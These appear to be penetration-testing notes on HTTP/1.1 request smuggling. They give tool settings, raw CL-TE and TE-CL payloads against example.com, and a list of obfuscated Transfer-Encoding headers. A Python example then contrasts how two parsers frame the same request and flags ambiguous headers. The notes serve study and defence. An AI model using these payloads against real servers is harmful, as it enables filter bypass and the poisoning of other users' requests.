What is Request Smuggling HTTP/1.1

A vulnerability where attackers exploit discrepancies in how HTTP/1.1 requests are parsed by different servers (e.g., a proxy and a backend). By manipulating headers like Transfer-Encoding and Content-Length, an attacker can craft requests that are interpreted differently by each server, potentially bypassing security filters, causing unauthorized access, or smuggling malicious requests to be processed by the backend.


Methodology

# IMPORTANT SETTING
- Disable "Update Content-Length" (otherwise the tool silently rewrites the header you are testing)
- Set the request to HTTP/1.1 (both in the settings and in the request line)
- Enable visualisation of the \r \n characters

Remember that \r and \n each count as one byte when computing Content-Length
---------------------------------------------------------------------------------

# Identify the Front-End Server header

Which header does the front-end use to frame the request body: Content-Length (CL) or Transfer-Encoding (TE)

----------------------------------------------------------------------------------
Payloads

# CL-TE

POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

0

GPOST / HTTP/1.1
Host: example.com

----------------------------------------------------------------------------------
# TE-CL

POST / HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 6

0

X

----------------------------------------------------------------------------------
# TE-TE (obfuscating the TE header)

Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[newline]Transfer-Encoding: chunked
Transfer-Encoding : chunked
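The framing disagreement behind the CL-TE and TE-CL payloads above, and the malformed Transfer-Encoding variants in the TE-TE list, as an added Python example that is not part of these notes. It parses the same bytes once with Content-Length precedence and once with Transfer-Encoding precedence and reports what each leaves in the buffer for the next request, then lists the header properties a strict front-end should reject before forwarding (an assumed reject policy modelled on RFC 7230 section 3.3.3; function names and the sample requests are constructed here).

```python
# Added example (not from the original notes): compare CL-first vs TE-first
# framing of one HTTP/1.1 request and flag ambiguous framing headers.

# Constructed sample: the CL-TE payload from the notes, as raw bytes.
SAMPLE_CL_TE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"G"
)

# Constructed sample: an unambiguous chunked request with no Content-Length.
SAMPLE_CLEAN = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"3\r\nabc\r\n0\r\n\r\n"
)


def split_head(raw):
    """Return (header lines without the request line, offset of first body byte)."""
    head_end = raw.find(b"\r\n\r\n")
    if head_end < 0:
        raise ValueError("incomplete header block")
    lines = raw[:head_end].decode("latin-1").split("\r\n")
    return lines[1:], head_end + 4


def header_map(lines):
    """Lenient name -> value map, roughly how a forgiving server normalises headers."""
    out = {}
    for line in lines:
        name, _, value = line.partition(":")
        out[name.strip().lower()] = value.strip()
    return out


def chunked_body_end(raw, pos):
    """Offset just past the terminating zero-size chunk (trailers not handled)."""
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("incomplete chunk-size line")
        size = int(raw[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            eol = raw.find(b"\r\n", pos)
            if eol < 0:
                raise ValueError("incomplete last-chunk")
            return eol + 2
        pos += size + 2  # chunk data plus its trailing CRLF


def frame(raw, prefer):
    """Consume one request with 'cl' or 'te' precedence; return (request, leftover)."""
    lines, body_start = split_head(raw)
    hdrs = header_map(lines)
    te = hdrs.get("transfer-encoding", "").lower()
    if prefer == "te" and te == "chunked":
        end = chunked_body_end(raw, body_start)
    elif "content-length" in hdrs:
        end = body_start + int(hdrs["content-length"])
    elif te == "chunked":
        end = chunked_body_end(raw, body_start)
    else:
        end = body_start
    return raw[:end], raw[end:]


def compare_framing(raw):
    """What each precedence leaves behind: the bytes the backend will treat as the next request."""
    _, cl_left = frame(raw, "cl")
    _, te_left = frame(raw, "te")
    return {"cl_leftover": cl_left, "te_leftover": te_left, "differs": cl_left != te_left}


def framing_issues(raw):
    """Reasons a strict front-end should reject the request rather than forward it."""
    lines, _ = split_head(raw)
    issues, names, te_count = [], set(), 0
    for line in lines:
        name, _, value = line.partition(":")
        if line[:1] in (" ", "\t"):
            issues.append("header line starts with whitespace (obs-fold)")
        if name != name.rstrip():
            issues.append("whitespace before colon")
        if any(ch in value for ch in "\r\n\x00"):
            issues.append("control character inside header value")
        key = name.strip().lower()
        names.add(key)
        if key == "transfer-encoding":
            te_count += 1
            if [t.strip().lower() for t in value.split(",")] != ["chunked"]:
                issues.append("Transfer-Encoding value is not exactly 'chunked'")
    if te_count > 1:
        issues.append("duplicate Transfer-Encoding header")
    if "transfer-encoding" in names and "content-length" in names:
        issues.append("both Content-Length and Transfer-Encoding present")
    return issues
```

Running `compare_framing(SAMPLE_CL_TE)` shows the CL-first parser consuming all six body bytes while the TE-first parser stops after the empty chunk and leaves the `G` in the buffer, which is exactly the prefix that turns the next request into `GPOST`. `framing_issues` is the check to put in front of the forwarding path: anything it returns is a request whose framing two parsers may disagree on, so it should be rejected (or normalised to a single framing header) rather than forwarded as-is.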

Tool